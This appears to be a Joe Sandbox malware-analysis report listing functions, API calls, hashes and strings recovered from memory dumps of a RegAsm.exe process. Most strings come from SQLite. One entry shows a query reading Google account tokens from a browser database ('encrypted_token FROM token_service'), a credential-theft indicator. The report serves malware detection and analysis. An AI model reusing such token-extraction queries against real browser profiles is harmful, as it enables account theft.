Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$AllocLocallstrcat$memcmpmemset
String ID: AccountId$GoogleAccounts$GoogleAccounts$SELECT service, encrypted_token FROM token_service
API String ID: 2910778473-1713091031
Opcode ID: 7d5ed18ac61e3623f7527cf3b0272fe0aac5e728e85b1a854615acc292eaa145
Instruction ID: c4cb561b851d9ad46cf7f56b89ea9e95a2426b849739b0bc6f678560fdc0b582
Opcode Fuzzy Hash: 7d5ed18ac61e3623f7527cf3b0272fe0aac5e728e85b1a854615acc292eaa145
Instruction Fuzzy Hash: 09D18271805248EACB14E7E5D955BDDBBB8AF19308F1440AEF906B3282DF785B08C779

Uniqueness

Uniqueness Score: -1.00%

Function 19C630F0 Relevance: 12.2, APIs: 8, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6580e5237cb44123b0f9dc7569dc3de52b866290fda7dbe56c1979d4f77269bb
Instruction ID: d7b5179947fd034f29ca7a51521f2cfcdb544d65db4a5b554bd56d58f7f044a0
Opcode Fuzzy Hash: 6580e5237cb44123b0f9dc7569dc3de52b866290fda7dbe56c1979d4f77269bb
Instruction Fuzzy Hash: DB519572608200AFDB41EB64FC45F9A7BE2EFC5310F1984A4F188872B2E631DD519B52

Uniqueness

Uniqueness Score: -1.00%

Function 19CB7920 Relevance: 10.8, APIs: 7, Instructions: 338COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7c0a64c567377825aa826e38cd61e7aab24cd6bc2d57a6723dcf8eefeade29f
Instruction ID: 0d9e7bf604f4da3b83d662064e19cb95599ae65349cdc0698d7185cb7d724617
Opcode Fuzzy Hash: d7c0a64c567377825aa826e38cd61e7aab24cd6bc2d57a6723dcf8eefeade29f
Instruction Fuzzy Hash: 8DB1B0B2A04202ABC704CF28DC81A5AB7E5FF88254F4C552DF989D7B51E735F9248BA1

Uniqueness

Uniqueness Score: -1.00%

Function 19C55930 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 234COMMON

Download Yara Rule

Strings

unknown tokenizer: %s, xrefs: 19C55B28
simple, xrefs: 19C55A38, 19C55A84, 19C55A95, 19C55B27
CREATE TABLE x(input, token, start, end, position), xrefs: 19C55933

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: CREATE TABLE x(input, token, start, end, position)$simple$unknown tokenizer: %s
API String ID: 0-2679805236
Opcode ID: dec81a8c913f822b74d608ec1005c79327380aa75dbf3d8abc2aecfc7c71a2e8
Instruction ID: 3770d240644da21272d2303cf64e65d8494905be6caa56567c3b177a4acbd634
Opcode Fuzzy Hash: dec81a8c913f822b74d608ec1005c79327380aa75dbf3d8abc2aecfc7c71a2e8
Instruction Fuzzy Hash: E4714A72A043868FD701DF28EC88A5AB7E4FF94354F0C4529EC8AD7291EB35E505CB96

Uniqueness

Uniqueness Score: -1.00%

Function 19D5F0E0 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 216COMMON

Download Yara Rule

Strings

unable to delete/modify user-function due to active statements, xrefs: 19D5F157, 19D5F298
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19D5F1DC, 19D5F31D
misuse, xrefs: 19D5F1E6, 19D5F327
%s at line %d of [%.10s], xrefs: 19D5F1EB, 19D5F32C

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$unable to delete/modify user-function due to active statements
API String ID: 0-3864549341
Opcode ID: 125182a9f4ed8f845f3041c7702c7fa9815bec178ce6b5ebdd337bd8a728e584
Instruction ID: 86d6a4248e50fad18a1a703e14e4eb839c495f2965a67ab4a6d13c23bf6f0649
Opcode Fuzzy Hash: 125182a9f4ed8f845f3041c7702c7fa9815bec178ce6b5ebdd337bd8a728e584
Instruction Fuzzy Hash: F86169B5640B416BFB118B28CC49F9777B4AF41304F1C4168E45B9FEC2E7A5E150C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 19C63F30 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 169COMMON

Download Yara Rule

Strings

tokenchars=, xrefs: 19C6406A
remove_diacritics=0, xrefs: 19C63FE1
remove_diacritics=1, xrefs: 19C63FA2
separators=, xrefs: 19C640A3
remove_diacritics=2, xrefs: 19C64021

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: remove_diacritics=0$remove_diacritics=1$remove_diacritics=2$separators=$tokenchars=
API String ID: 0-131617836
Opcode ID: 4149d78d88c1096cbadb03de33a356b5b946f7ac7828653b98ec993578f5cfa7
Instruction ID: dacb6c2141bf62403e5cb1da0d318ec34681a55166c7a3ebfbd03c61f7eef598
Opcode Fuzzy Hash: 4149d78d88c1096cbadb03de33a356b5b946f7ac7828653b98ec993578f5cfa7
Instruction Fuzzy Hash: F051F576A041828BD3018F14E4C177AF7B2BB52724FCD41A8E8C64B7A5DB32ED868751

Uniqueness

Uniqueness Score: -1.00%

Function 19C61120 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 169COMMON

Download Yara Rule

Strings

main, xrefs: 19C611A6
rbu_memory, xrefs: 19C611F5

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: main$rbu_memory
API String ID: 0-3973752345
Opcode ID: 76da0dd798032d48ba292e4bb9356b9467f509f92a48e22dcc53a804c7d439b1
Instruction ID: b501187e9b07cd15782e2b8e53faf8ae4e7685beda5aedc640b51663fc57735d
Opcode Fuzzy Hash: 76da0dd798032d48ba292e4bb9356b9467f509f92a48e22dcc53a804c7d439b1
Instruction Fuzzy Hash: D351D376A003419FD701DFA5E8C4B5AB3E8FB84316F188029EC89D7761DB35E945CB91

Uniqueness

Uniqueness Score: -1.00%

Function 19D69350 Relevance: 10.6, APIs: 7, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2ad544cd8e2d13b67cec0c0d631855afa69b202b164db0b7f7df2351bb6bf9a
Instruction ID: 8f81cedfc6a3607bbe8e71f56b42eada8f3b6ddd42dfcf40347e59ea44f5b12c
Opcode Fuzzy Hash: d2ad544cd8e2d13b67cec0c0d631855afa69b202b164db0b7f7df2351bb6bf9a
Instruction Fuzzy Hash: 44515D71D102A0DBD7137BB4E9CCA6B37B8BF0078AB188024ED4A93671DB35E454DB66

Uniqueness

Uniqueness Score: -1.00%

Function 19CF15C0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 135COMMON

Download Yara Rule

Strings

%!0.15g, xrefs: 19CF160A
null, xrefs: 19CF15EE
JSON cannot hold BLOB values, xrefs: 19CF16D9

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: %!0.15g$JSON cannot hold BLOB values$null
API String ID: 0-3074873597
Opcode ID: 884105b442b255ab721275418368d280b2e37ea8a21c3937643698c35c099b1f
Instruction ID: aed40f492f8d626a11f69bd741d2a3466369dab0d5ab73da37f0157b3bcd047f
Opcode Fuzzy Hash: 884105b442b255ab721275418368d280b2e37ea8a21c3937643698c35c099b1f
Instruction Fuzzy Hash: EA419DB6600B406FF3505B14FC82B9A77A4FBC3329F1C053AE1D1C25C2D76AA59883E1

Uniqueness

Uniqueness Score: -1.00%

Function 19C61D50 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 132COMMON

Download Yara Rule

Strings

CREATE TABLE x( name TEXT, path TEXT, pageno INTEGER, pagetype TEXT, ncell INTEGER, payload INTEGER, unused INTEGER, mx_payload INTEGER, pgoffset INTEGER, pgsize INTEGER, schema TEXT HIDDEN, aggregate BOOLEAN HIDDEN), xrefs: 19C61E2C
no such database: %s, xrefs: 19C61E05

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: CREATE TABLE x( name TEXT, path TEXT, pageno INTEGER, pagetype TEXT, ncell INTEGER, payload INTEGER, unused INTEGER, mx_payload INTEGER, pgoffset INTEGER, pgsize INTEGER, schema TEXT HIDDEN, aggregate BOOLEAN HIDDEN)$no such database: %s
API String ID: 0-1404816483
Opcode ID: eefa0905c151c0c3ab08b7192c478c94ab4b578d24be8650855b4f01ccfac575
Instruction ID: c1fa4848d9df154e90ac4d13490b7949721dca90061830a1404a9953637b88fe
Opcode Fuzzy Hash: eefa0905c151c0c3ab08b7192c478c94ab4b578d24be8650855b4f01ccfac575
Instruction Fuzzy Hash: 443147767043096BD3105F69EC40B5BB7E8FF81256F095169FD9897780EA76F90087B0

Uniqueness

Uniqueness Score: -1.00%

Function 19C79CD0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 74COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19C79CF1
misuse, xrefs: 19C79CFB
API called with finalized prepared statement, xrefs: 19C79CE5
%s at line %d of [%.10s], xrefs: 19C79D00

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-3620335220
Opcode ID: 59ad3d82d6d75e7f9f12db1d6bb8b13d5c20c6d85fe683846c8fd94e8e8e5f59
Instruction ID: 7c403d7862c0f33100d086947e6b3662ec93f18ffeaad5d3bda894f4ecc685f1
Opcode Fuzzy Hash: 59ad3d82d6d75e7f9f12db1d6bb8b13d5c20c6d85fe683846c8fd94e8e8e5f59
Instruction Fuzzy Hash: 14113D7BF0076167FA119568FC45FCA63A89F9166AF0C4035F98596240EA20B84542F3

Uniqueness

Uniqueness Score: -1.00%

Function 004118E0 Relevance: 10.5, APIs: 4, Strings: 3, Instructions: 43stringCOMMON

Download Yara Rule

APIs

StrStrA.SHLWAPI(01461D58,?,00000104,00000000,?,00412525,?,01461D58,00000000), ref: 004118ED
lstrcpyn.KERNEL32(C:\Users\user\Desktop\,01461D58,00000000,00000000,?,00412525,?,01461D58,00000000), ref: 0041190B
lstrlen.KERNEL32(?,?,00412525,?,01461D58,00000000,?,?,?,?,?,?,?,00000000), ref: 0041191E
wsprintfA.USER32 ref: 00411931

Strings

%s%s, xrefs: 0041192B
C:\Users\user\Desktop\, xrefs: 00411906, 0041193C
%%A, xrefs: 00411924, 0041192A

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpynlstrlenwsprintf
String ID: %%A$%s%s$C:\Users\user\Desktop\
API String ID: 1206339513-3967180970
Opcode ID: b3af0c830d7c66efbf35a3d675616cfa4270fd700d5d968e88c3d55ec8686320
Instruction ID: c5a9d92ede5ea4987b478224b8b0572e4dbdbd0cbd861403dae5f6f932e9b4ff
Opcode Fuzzy Hash: b3af0c830d7c66efbf35a3d675616cfa4270fd700d5d968e88c3d55ec8686320
Instruction Fuzzy Hash: 7EF0F0762402096FDB005F5CEC88DEBBBEEEF8A364B505116F9088B300CB359C82C6B0

Uniqueness

Uniqueness Score: -1.00%

Function 19CF31F0 Relevance: 9.5, APIs: 6, Instructions: 466COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1683cfc9ca1ecb5763dea7caf9e6c897c6944f876fdb0e11cca461729700cff5
Instruction ID: b4afe0da6d6bd4e27967af0e5b9ff18ccb742a3aefdde205a49e0d69cc418bab
Opcode Fuzzy Hash: 1683cfc9ca1ecb5763dea7caf9e6c897c6944f876fdb0e11cca461729700cff5
Instruction Fuzzy Hash: 43F10772A04341AFDB45CF24E48075ABBE0BF843A4F18466DECD997381D735E94ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00412070 Relevance: 9.1, APIs: 6, Instructions: 115stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 004120B0
StrCmpCA.SHLWAPI(00000000,00428340,?,?,?,00000000), ref: 004120FC
StrCmpCA.SHLWAPI(00000000,00428344,00000000,?,?,?,00000000), ref: 00412142
StrCmpCA.SHLWAPI(00000000,00428348,?,?,?,00000000), ref: 0041216E
StrCmpCA.SHLWAPI(00000000,0042834C,?,?,?,00000000), ref: 0041219A
strtok_s.MSVCRT ref: 004121CC

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: strtok_s
String ID:
API String ID: 3330995566-0
Opcode ID: 8ab808e521ad988e47ca2df6490754f693fd19acd19366fb3acbd8f1064129c7
Instruction ID: e7a2fe36a0400bda3f7ffef75447838ffcf0b53659d9e15460f3b2746b801767
Opcode Fuzzy Hash: 8ab808e521ad988e47ca2df6490754f693fd19acd19366fb3acbd8f1064129c7
Instruction Fuzzy Hash: 11419E74600205EFCB10DF58D944BE9B7B8FF15304FA0465EE605D3284DBB9A6B8CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0041C2D7 Relevance: 9.1, APIs: 6, Instructions: 98COMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 0041C2E5

Part of subcall function 0041ACC3: __mtinitlocknum.LIBCMT ref: 0041ACD9
Part of subcall function 0041ACC3: __amsg_exit.LIBCMT ref: 0041ACE5
Part of subcall function 0041ACC3: EnterCriticalSection.KERNEL32(00000000,00000000,?,0041B931,0000000D,?,?,0041BD85,0041A822,?,?,0041992B,00000000,0042E920,00419972,0040FCB0), ref: 0041ACED

